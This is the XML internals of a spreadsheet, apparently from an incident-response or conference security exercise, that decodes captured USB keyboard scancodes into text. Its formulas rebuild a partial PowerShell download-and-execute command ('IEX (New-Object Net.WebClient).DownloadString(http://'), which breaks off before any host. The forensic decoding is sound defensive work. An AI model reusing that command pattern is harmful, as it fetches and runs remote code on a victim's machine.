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.fornal/Projects/pentest/root/codemash-2020/incident-response/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{9FE2D3C0-8C3E-214C-8690-3CB83D6109E3}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="10680" yWindow="460" windowWidth="22920" windowHeight="18560" xr2:uid="{78AB0D3D-CB74-8C48-9B00-066B5DC3F79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2" i="1" l="1"/>
  <c r="F97" i="1"/>
  <c r="F74" i="1"/>
  <c r="F34" i="1"/>
  <c r="F18" i="1"/>
  <c r="F2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123" i="1"/>
  <c r="A124" i="1" s="1"/>
  <c r="A125" i="1" s="1"/>
  <c r="A126" i="1" s="1"/>
  <c r="A119" i="1"/>
  <c r="A120" i="1" s="1"/>
  <c r="A116" i="1"/>
  <c r="A117" i="1" s="1"/>
  <c r="A110" i="1"/>
  <c r="A111" i="1" s="1"/>
  <c r="A112" i="1" s="1"/>
  <c r="A113" i="1" s="1"/>
  <c r="A103" i="1"/>
  <c r="A104" i="1" s="1"/>
  <c r="A105" i="1" s="1"/>
  <c r="A106" i="1" s="1"/>
  <c r="A107" i="1" s="1"/>
  <c r="A100" i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68" i="1"/>
  <c r="A69" i="1" s="1"/>
  <c r="A70" i="1" s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45" i="1"/>
  <c r="A46" i="1" s="1"/>
  <c r="A47" i="1" s="1"/>
  <c r="A48" i="1" s="1"/>
  <c r="A49" i="1" s="1"/>
  <c r="A42" i="1"/>
  <c r="A36" i="1"/>
  <c r="A37" i="1" s="1"/>
  <c r="A38" i="1" s="1"/>
  <c r="A39" i="1" s="1"/>
  <c r="A29" i="1"/>
  <c r="A30" i="1" s="1"/>
  <c r="A31" i="1" s="1"/>
  <c r="A32" i="1" s="1"/>
  <c r="A33" i="1" s="1"/>
  <c r="A25" i="1"/>
  <c r="A26" i="1" s="1"/>
  <c r="A23" i="1"/>
  <c r="A18" i="1"/>
  <c r="A19" i="1" s="1"/>
  <c r="A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5" i="1"/>
  <c r="A4" i="1"/>
  <c r="A3" i="1"/>
  <c r="A52" i="2"/>
  <c r="A51" i="2"/>
  <c r="A50" i="2"/>
  <c r="A49" i="2"/>
  <c r="A48" i="2"/>
  <c r="A47" i="2"/>
  <c r="A46" i="2"/>
  <c r="A45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2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" i="2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5" i="1"/>
  <c r="C16" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="271" uniqueCount="134">
  <si>
    <t>1a</t>
  </si>
  <si>
    <t>13</t>
  </si>
  <si>
    <t>12</t>
  </si>
  <si>
    <t>08</t>
  </si>
  <si>
    <t>0b</t>
  </si>
  <si>
    <t>15</t>
  </si>
  <si>
    <t>16</t>
  </si>
  <si>
    <t>0f</t>
  </si>
  <si>
    <t>37</t>
  </si>
  <si>
    <t>1b</t>
  </si>
  <si>
    <t>2c</t>
  </si>
  <si>
    <t>02</t>
  </si>
  <si>
    <t>34</t>
  </si>
  <si>
    <t>0c</t>
  </si>
  <si>
    <t>00</t>
  </si>
  <si>
    <t>26</t>
  </si>
  <si>
    <t>11</t>
  </si>
  <si>
    <t>2d</t>
  </si>
  <si>
    <t>05</t>
  </si>
  <si>
    <t>0d</t>
  </si>
  <si>
    <t>06</t>
  </si>
  <si>
    <t>17</t>
  </si>
  <si>
    <t>2a</t>
  </si>
  <si>
    <t>27</t>
  </si>
  <si>
    <t>07</t>
  </si>
  <si>
    <t>04</t>
  </si>
  <si>
    <t>0a</t>
  </si>
  <si>
    <t>33</t>
  </si>
  <si>
    <t>38</t>
  </si>
  <si>
    <t>1d</t>
  </si>
  <si>
    <t>19</t>
  </si>
  <si>
    <t>0e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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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ENTER</t>
  </si>
  <si>
    <t>ESC</t>
  </si>
  <si>
    <t>DEL</t>
  </si>
  <si>
    <t>TAB</t>
  </si>
  <si>
    <t>SPACE</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>[</t>
  </si>
  <si>
    <t>]</t>
  </si>
  <si>
    <t>/</t>
  </si>
  <si>
    <t>RIGHT ARROW</t>
  </si>
  <si>
    <t>LEFT ARROW</t>
  </si>
  <si>
    <t>CAPS LOCK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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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EQUAL</t>
  </si>
  <si>
    <t>\</t>
  </si>
  <si>
    <t>~</t>
  </si>
  <si>
    <t>;</t>
  </si>
  <si>
    <t>QUOTE</t>
  </si>
  <si>
    <t>COMMA</t>
  </si>
  <si>
    <t>PERIOD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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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!</t>
  </si>
  <si>
    <t>@</t>
  </si>
  <si>
    <t>#</t>
  </si>
  <si>
    <t>$</t>
  </si>
  <si>
    <t>%</t>
  </si>
  <si>
    <t>^</t>
  </si>
  <si>
    <t>&amp;</t>
  </si>
  <si>
    <t>*</t>
  </si>
  <si>
    <t>(</t>
  </si>
  <si>
    <t>)</t>
  </si>
  <si>
    <t>_</t>
  </si>
  <si>
    <t>+</t>
  </si>
  <si>
    <t>{</t>
  </si>
  <si>
    <t>}</t>
  </si>
  <si>
    <t>|</t>
  </si>
  <si>
    <t>`</t>
  </si>
  <si>
    <t>:</t>
  </si>
  <si>
    <t>DOUBLE-QUOTE</t>
  </si>
  <si>
    <t>&lt;</t>
  </si>
  <si>
    <t>&gt;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</si>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</sst>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1"/>
      <color theme="1"/>
      <name val="Georgia"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="15"/>
      <color rgb="FFE74C3C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7938-308E-A64F-BDE5-338726EFBEFE}">
  <dimension ref="A2:F127"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A89" workbookViewId="0">
      <selection activeCell="F112" sqref="F112"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <sheetData>
    <row r="2" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B2" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C2">
        <f t="shared" ref="C2:C14" si="0">HEX2DEC(B2)</f>
        <v>19</v>
      </c>
      <c r="D2" t="str">
        <f>IF(A2="00",VLOOKUP(C2,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C2,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>p</v>
      </c>
      <c r="F2" t="str">
        <f>_xlfn.CONCAT(D2:D11,".",D13:D15," \""")</f>
        <v>powershell.exe \"</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A3" t="str">
        <f>A2</f>
        <v>00</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>2</v>
      </c>
      <c r="C3">
        <f t="shared" si="0"/>
        <v>18</v>
      </c>
      <c r="D3" t="str">
        <f>IF(A3="00",VLOOKUP(C3,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C3,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>o</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A4" t="str">
        <f t="shared" ref="A4:A16" si="1">A3</f>
        <v>00</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>0</v>
      </c>
      <c r="C4">
        <f t="shared" si="0"/>
        <v>26</v>
      </c>
      <c r="D4" t="str">
        <f>IF(A4="00",VLOOKUP(C4,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C4,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>w</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A5" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C5">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="D5" t="str">
        <f>IF(A5="00",VLOOKUP(C5,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C5,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>e</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A6" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C6">
        <f t="shared" si="0"/>
        <v>21</v>
      </c>
      <c r="D6" t="str">
        <f>IF(A6="00",VLOOKUP(C6,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C6,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>r</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A7" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C7">
        <f t="shared" si="0"/>
        <v>22</v>
      </c>
      <c r="D7" t="str">
        <f>IF(A7="00",VLOOKUP(C7,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C7,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>s</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A8" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>4</v>
      </c>
      <c r="C8">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="D8" t="str">
        <f>IF(A8="00",VLOOKUP(C8,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C8,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>h</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A9" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C9">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="D9" t="str">
        <f>IF(A9="00",VLOOKUP(C9,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C9,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>e</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A10" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>7</v>
      </c>
      <c r="C10">
        <f t="shared" si="0"/>
        <v>15</v>
      </c>
      <c r="D10" t="str">
        <f>IF(A10="00",VLOOKUP(C10,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C10,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>l</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A11" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>7</v>
      </c>
      <c r="C11">
        <f t="shared" si="0"/>
        <v>15</v>
      </c>
      <c r="D11" t="str">
        <f>IF(A11="00",VLOOKUP(C11,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C11,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>l</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A12" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>8</v>
      </c>
      <c r="C12">
        <f t="shared" si="0"/>
        <v>55</v>
      </c>
      <c r="D12" t="str">
        <f>IF(A12="00",VLOOKUP(C12,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C12,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>PERIOD</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A13" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C13">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="D13" t="str">
        <f>IF(A13="00",VLOOKUP(C13,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C13,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>e</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A14" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C14">
        <f t="shared" si="0"/>
        <v>27</v>
      </c>
      <c r="D14" t="str">
        <f>IF(A14="00",VLOOKUP(C14,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C14,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>x</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A15" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C15">
        <f>HEX2DEC(B15)</f>
        <v>8</v>
      </c>
      <c r="D15" t="str">
        <f>IF(A15="00",VLOOKUP(C15,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C15,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>e</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A16" t="str">
        <f t="shared" si="1"/>
        <v>00</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>10</v>
      </c>
      <c r="C16">
        <f>HEX2DEC(B16)</f>
        <v>44</v>
      </c>
      <c r="D16" t="str">
        <f>IF(A16="00",VLOOKUP(C16,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C16,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>SPACE</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C17">
        <f t="shared" ref="C17:C80" si="2">HEX2DEC(B17)</f>
        <v>52</v>
      </c>
      <c r="D17" t="str">
        <f>IF(A17="00",VLOOKUP(C17,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C17,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>DOUBLE-QUOTE</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A18" t="str">
        <f t="shared" ref="A18:A20" si="3">A17</f>
        <v>02</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>13</v>
      </c>
      <c r="C18">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="D18" t="str">
        <f>IF(A18="00",VLOOKUP(C18,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C18,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>I</v>
      </c>
      <c r="F18" t="str">
        <f>_xlfn.CONCAT(F2, D18:D20, " ", D22:D32, " ")</f>
        <v xml:space="preserve">powershell.exe \"IEX (New-Object </v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A19" t="str">
        <f t="shared" si="3"/>
        <v>02</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C19">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="D19" t="str">
        <f>IF(A19="00",VLOOKUP(C19,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C19,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>E</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A20" t="str">
        <f t="shared" si="3"/>
        <v>02</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>9</v>
      </c>
      <c r="C20">
        <f t="shared" si="2"/>
        <v>27</v>
      </c>
      <c r="D20" t="str">
        <f>IF(A20="00",VLOOKUP(C20,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C20,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>X</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>10</v>
      </c>
      <c r="C21">
        <f t="shared" si="2"/>
        <v>44</v>
      </c>
      <c r="D21" t="str">
        <f>IF(A21="00",VLOOKUP(C21,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C21,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>SPACE</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C22">
        <f t="shared" si="2"/>
        <v>38</v>
      </c>
      <c r="D22" t="str">
        <f>IF(A22="00",VLOOKUP(C22,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C22,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>(</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A23" t="str">
        <f>A22</f>
        <v>02</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C23">
        <f t="shared" si="2"/>
        <v>17</v>
      </c>
      <c r="D23" t="str">
        <f>IF(A23="00",VLOOKUP(C23,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C23,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>N</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A24" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C24">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="D24" t="str">
        <f>IF(A24="00",VLOOKUP(C24,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C24,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>e</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A25" t="str">
        <f>A24</f>
        <v>00</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>0</v>
      </c>
      <c r="C25">
        <f t="shared" si="2"/>
        <v>26</v>
      </c>
      <c r="D25" t="str">
        <f>IF(A25="00",VLOOKUP(C25,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C25,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>w</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A26" t="str">
        <f>A25</f>
        <v>00</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>17</v>
      </c>
      <c r="C26">
        <f t="shared" si="2"/>
        <v>45</v>
      </c>
      <c r="D26" t="str">
        <f>IF(A26="00",VLOOKUP(C26,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C26,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>-</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A27" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>2</v>
      </c>
      <c r="C27">
        <f t="shared" si="2"/>
        <v>18</v>
      </c>
      <c r="D27" t="str">
        <f>IF(A27="00",VLOOKUP(C27,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C27,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>O</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A28" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C28">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="D28" t="str">
        <f>IF(A28="00",VLOOKUP(C28,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C28,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>b</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A29" t="str">
        <f>A28</f>
        <v>00</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>19</v>
      </c>
      <c r="C29">
        <f t="shared" si="2"/>
        <v>13</v>
      </c>
      <c r="D29" t="str">
        <f>IF(A29="00",VLOOKUP(C29,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C29,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>j</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A30" t="str">
        <f>A29</f>
        <v>00</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C30">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="D30" t="str">
        <f>IF(A30="00",VLOOKUP(C30,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C30,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>e</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A31" t="str">
        <f>A30</f>
        <v>00</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C31">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="D31" t="str">
        <f>IF(A31="00",VLOOKUP(C31,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C31,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>c</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A32" t="str">
        <f>A31</f>
        <v>00</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>21</v>
      </c>
      <c r="C32">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
      <c r="D32" t="str">
        <f>IF(A32="00",VLOOKUP(C32,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C32,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>t</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A33" t="str">
        <f>A32</f>
        <v>00</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>10</v>
      </c>
      <c r="C33">
        <f t="shared" si="2"/>
        <v>44</v>
      </c>
      <c r="D33" t="str">
        <f>IF(A33="00",VLOOKUP(C33,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C33,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>SPACE</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A34" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C34">
        <f t="shared" si="2"/>
        <v>17</v>
      </c>
      <c r="D34" t="str">
        <f>IF(A34="00",VLOOKUP(C34,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C34,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>N</v>
      </c>
      <c r="F34" t="str">
        <f>_xlfn.CONCAT(F18, D34, D35, D38, ".", D40:D50, ".", D52:D73)</f>
        <v>powershell.exe \"IEX (New-Object Net.WebCclient).Downloadstring(http://</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A35" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B35" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C35">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="D35" t="str">
        <f>IF(A35="00",VLOOKUP(C35,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C35,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>e</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A36" t="str">
        <f t="shared" ref="A36:A39" si="4">A35</f>
        <v>00</v>
      </c>
      <c r="B36" s="1" t="s">
        <v>0</v>
      </c>
      <c r="C36">
        <f t="shared" si="2"/>
        <v>26</v>
      </c>
      <c r="D36" t="str">
        <f>IF(A36="00",VLOOKUP(C36,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C36,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>w</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A37" t="str">
        <f t="shared" si="4"/>
        <v>00</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>22</v>
      </c>
      <c r="C37">
        <f t="shared" si="2"/>
        <v>42</v>
      </c>
      <c r="D37" t="str">
        <f>IF(A37="00",VLOOKUP(C37,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C37,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>DEL</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A38" t="str">
        <f t="shared" si="4"/>
        <v>00</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>21</v>
      </c>
      <c r="C38">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
      <c r="D38" t="str">
        <f>IF(A38="00",VLOOKUP(C38,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C38,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>t</v>
      </c>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A39" t="str">
        <f t="shared" si="4"/>
        <v>00</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>8</v>
      </c>
      <c r="C39">
        <f t="shared" si="2"/>
        <v>55</v>
      </c>
      <c r="D39" t="str">
        <f>IF(A39="00",VLOOKUP(C39,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C39,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>PERIOD</v>
      </c>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A40" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>0</v>
      </c>
      <c r="C40">
        <f t="shared" si="2"/>
        <v>26</v>
      </c>
      <c r="D40" t="str">
        <f>IF(A40="00",VLOOKUP(C40,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C40,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>W</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A41" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B41" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C41">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="D41" t="str">
        <f>IF(A41="00",VLOOKUP(C41,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C41,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>e</v>
      </c>
    </row>
    <row r="42" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A42" t="str">
        <f>A41</f>
        <v>00</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C42">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="D42" t="str">
        <f>IF(A42="00",VLOOKUP(C42,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C42,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>b</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A43" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C43">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="D43" t="str">
        <f>IF(A43="00",VLOOKUP(C43,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C43,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>C</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A44" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C44">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="D44" t="str">
        <f>IF(A44="00",VLOOKUP(C44,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C44,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>c</v>
      </c>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A45" t="str">
        <f>A44</f>
        <v>00</v>
      </c>
      <c r="B45" s="1" t="s">
        <v>7</v>
      </c>
      <c r="C45">
        <f t="shared" si="2"/>
        <v>15</v>
      </c>
      <c r="D45" t="str">
